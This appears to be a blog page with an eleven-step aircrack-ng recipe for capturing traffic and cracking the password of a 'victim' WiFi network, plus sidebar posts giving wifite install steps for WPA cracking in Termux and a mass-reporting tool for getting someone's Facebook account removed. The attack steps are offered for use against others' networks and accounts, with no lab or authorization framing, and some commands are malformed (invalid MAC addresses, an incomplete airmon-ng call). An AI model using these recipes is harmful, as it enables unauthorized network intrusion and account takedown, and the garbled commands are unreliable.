Skip to main content

how to hack wifi using aircrack-ng in kali linux

Aircrack-ng is one of the tools that kali has to crack wireless


Step 1 : ifconfig wlan0 down
Step 2 : iwconfig wlan0 mode managed
Step 3 : ifconfig wlan0 up
Step 4 : airmon-ng check wlan0


Step 5 : kill process or with trouble
Step 6 : airmon-ng wlan0


Step 7 : airodump-ng wlan0


Step 8 : airodump-ng -c 6 -w SCAN_test --bssid(victim bssid) wlan0


Step 9 : aireplay-ng -1 0 -e (victim id name) -a CC:D1:S3:FE:GT:HH -h 00:cd:ca:45:df:gf wlan0
Step 10 : aireplay-ng -3 -b BSSID wlan0
Step 11 : aircrack-ng filename.cap
Now password will be cracking After cracked we can see the password of victim wifi..

My Youtube channel video link : https://youtu.be/XjvtJTA5FHo

=========Thanks to visit my page=============


Comments

Popular posts from this blog

How to Hack Wifi WPA,WPA2,WPA2 PSK in Termux

  How to Hack Wifi WPA,WPA2,WPA2 PSK  in Termux Wi-Fi All Hacking Tool Install       [Type the Command ] Step1: apt update && apt upgrade -y Step2:   apt install git Step3:  apt install python2 Step4:   git clone https://github.com/derv82/wifite.git Step5:  ls Step6:  cd wifite Step7:  python2 wifite.py       [open first page] Step8: git clone  https://github.com/derv82/wifite2 Step9 : ls Step10: cd wifite2 Step11:  ls Step12:  python2 Wifite.py I hope this information is useful for you. Please forgive any typos or incomplete sentences.

How to Remove Facebook Account by Pottu Report Tool Turmux in 5 Minutes

How to Remove Facebook Account by Pottu Report Tool Turmux in 5 Minutes    Step 1:  apt update && apt upgrade Step 2:  apt install python Step 3:  apt install git Step 4: git clone  https://github.com/IlayTamvan/Report Step 5: cd Report Step 6:  ls Step 7: unzip Report.zip Step 8:  python2 Report.py I hope this information is useful for you. Please forgive any typos or incomplete sentences.

How to Remove Termux Welcome Screen Text

How to Remove Termux Welcome Screen Text Open Termux App and Type - Step1: cd .. Step2: ls Step3: cd usr/etc Step4:  ls Step5:  rm -rf motd [#] Open New Terminal, and see the Termux Terminal is Totally clear.